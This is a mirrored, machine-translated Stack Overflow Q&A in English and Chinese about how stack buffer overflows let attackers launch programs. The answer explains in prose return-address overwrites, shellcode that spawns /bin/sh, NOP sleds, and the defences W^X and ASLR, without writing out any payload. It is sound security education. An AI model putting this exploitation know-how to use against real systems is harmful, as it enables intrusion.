堆栈内存溢出
  简体   繁体   English

是否可以通过另一个程序调用一个程序

[英]Is it possible to invoke a program through another program

 原文  2017-12-15 10:11:20       c++/ c/ security/ assembly/ buffer-overflow

问题描述

I'm reading an article about Buffer Overflow Attack: http://www.cse.scu.edu/~tschwarz/coen152_05/Lectures/BufferOverflow.html 我正在阅读有关缓冲区溢出攻击的文章: http : //www.cse.scu.edu/~tschwarz/coen152_05/Lectures/BufferOverflow.html
Theoretically I understand what it is talking about. 从理论上讲,我理解它在说什么。

But I can't imagine how a hacker program could be executed by this kind of attack. 但是我无法想象通过这种攻击如何执行黑客程序。
For the example in the article, the function bar is called because of the designed string. 对于本文中的示例,由于设计了字符串,因此调用了功能bar However, bar is a function of the same program. 但是, bar是同一程序的功能。 In other words, he is hacking himself on purpose. 换句话说,他是在故意黑客。 As I know, any address in a program only belongs itself, meaning that you can't invoke a function of another program thought its address. 据我所知,程序中的任何地址都仅属于其自身,这意味着您不能以其地址调用另一个程序的功能。

I just want to know that in real cases, how will a hacker do? 我只想知道,在实际情况下,黑客会怎么做?
As it said: 如它所说:

A real attack would try to place the address of the top of the stack in lieu of the return address, followed by some horrible lines of assembly code, such as a call to another tool. 真正的攻击将试图放置堆栈顶部的地址来代替返回地址,然后是一些可怕的汇编代码行,例如对另一个工具的调用。

what is "some horrible lines of assembly"? 什么是“一些可怕的装配线”? Is there a simple example? 有一个简单的例子吗?

1 个解决方案

解决方案1
 1 已采纳  2017-12-18 01:18:13

Go read Smashing The Stack For Fun And Profit . 继续阅读“ 粉碎堆栈以获取乐趣和获利” It has a specific example for 32-bit x86. 它有一个针对32位x86的特定示例。

Yes, programs run other programs all the time. 是的,程序始终在运行其他程序。 eg a command shell takes input that you type and runs that program. 例如,命令外壳接受您键入的输入并运行该程序。 Or in a GUI, double-clicking on a program runs it. 或在GUI中,双击程序即可运行它。 The program that draws the file-manager window and receives your double-clicks is itself a program (or graphical shell). 绘制文件管理器窗口并接收双击的程序本身就是一个程序(或图形外壳程序)。

Anyway, the OS has a system call for starting a new program , and by getting enough control to run a small amount of code in the process you're attacking, you (the attacker) can invoke that system call with args to start whatever program you want on the remote computer. 无论如何, 操作系统都有一个系统调用来启动新程序 ,并且通过获得足够的控制权来在您正在攻击的进程中运行少量代码,您(攻击者)可以使用args调用该系统调用以启动任何程序。您想要在远程计算机上。

Often you'd choose args like /bin/sh (the Unix shell). 通常您会选择/bin/sh之类的args(Unix shell)。 Depending on context, its input might still be connected to the network socket you used to send the exploit payload. 根据上下文的不同,其输入可能仍会连接到用于发送漏洞有效载荷的网络套接字。 (Often called "shellcode", because the typical exploit goal is to invoke a shell. Although the term is now more generic, and applies to any executable machine code exploit payload, especially when formatted as a string. Usually this means avoiding any 0 bytes in the machine code.) (通常称为“ shellcode”,因为典型的利用目标是调用shell。尽管该术语现在更为通用,并且适用于任何可执行的机器代码利用有效载荷,尤其是在格式化为字符串时。通常意味着避免任何0字节在机器代码中。)

As I know, any address in a program only belongs itself, meaning that you can't invoke a function of another program thought its address. 据我所知,程序中的任何地址都仅属于其自身,这意味着您不能以其地址调用另一个程序的功能。

Data is code, code is data . 数据就是代码,代码就是数据 As soon as your exploit payload (ie machine code) is read into memory by the process you're attacking, it has an address in the target process. 一旦被攻击的进程将漏洞利用有效载荷(即机器代码)读入内存,它就会在目标进程中具有地址。

The simplest kinds of buffer overflows include code and data that overwrites the return address of a function, so the function returns to the exploit payload instead of to its caller. 最简单的缓冲区溢出包括覆盖函数返回地址的代码和数据,因此函数返回漏洞利用有效负载而不是其调用方。 This is the classic stack-smashing attack for buffers allocated on the call stack, like char buf[16]; // nobody ever types more than 16 digit numbers, right? 这是对调用堆栈上分配的缓冲区的经典堆栈破坏攻击,例如char buf[16]; // nobody ever types more than 16 digit numbers, right? char buf[16]; // nobody ever types more than 16 digit numbers, right? inside a function. 在函数内部。

From that page, you already know how an attacker can take control of the return address with a buffer overflow. 从该页面,您已经知道攻击者如何利用缓冲区溢出来控制返回地址。

Things like non-executable memory eg W^X (either write or exec, not both), and ASLR (address-space layout randomization , are both designed to defeat this sort of attack. If stack addresses are randomized, it's might take a lot of tries before you manage to get the return address to land inside a bunch of NOPs (a "nop sled") in your exploit payload. 诸如W^X (写或exec,不是两者)之类的不可执行内存, 以及ASLR(地址空间布局随机化 )之类的东西都是为了克服这种攻击而设计的。如果将堆栈地址随机化,则可能会花费很多在设法使返回地址落入漏洞有效载荷中的一堆NOP(一个“ nod sled”)内之前,进行了多次尝试。

暂无
暂无

声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.

相关问题 浏览项目目录以在其自己的进程中调用或调用另一个程序或可执行文件 - Navigating through project directories to call or invoke another program or executable within its own process 是否可以使用C ++执行另一个程序? - Is it possible to execute another program using C++? 最小的软件包,用于与其他程序一起分发MinGW - Smallest possible package for distributing MinGW with another program 如何使用我自己的程序打开文件并让它调用另一个程序? - How do I open a file with my own program and have it invoke another program? 我只能在C ++中使用控制台中的另一个程序来调用程序吗 - Can I invoke a program using another program in console only in C++ 从另一个程序运行一个程序 - Running a program from another program 在另一个程序中启动一个程序 - launching a program inside another program 在Windows中通过c ++更改另一个程序的变量 - Change another program's variable through c++ in Windows 是否可以使用 C++ 在我的程序中嵌入另一个 exe? - Is it possible to embed another exe in my program using C++? 在Windows上的C ++中使用system(),为什么要在另一个目录中调用程序需要两个引号? - With system() in C++ on Windows, why are two quotes required to invoke a program in another directory?
相关标签
 
粤ICP备18138465号  © 2020-2024 STACKOOM.COM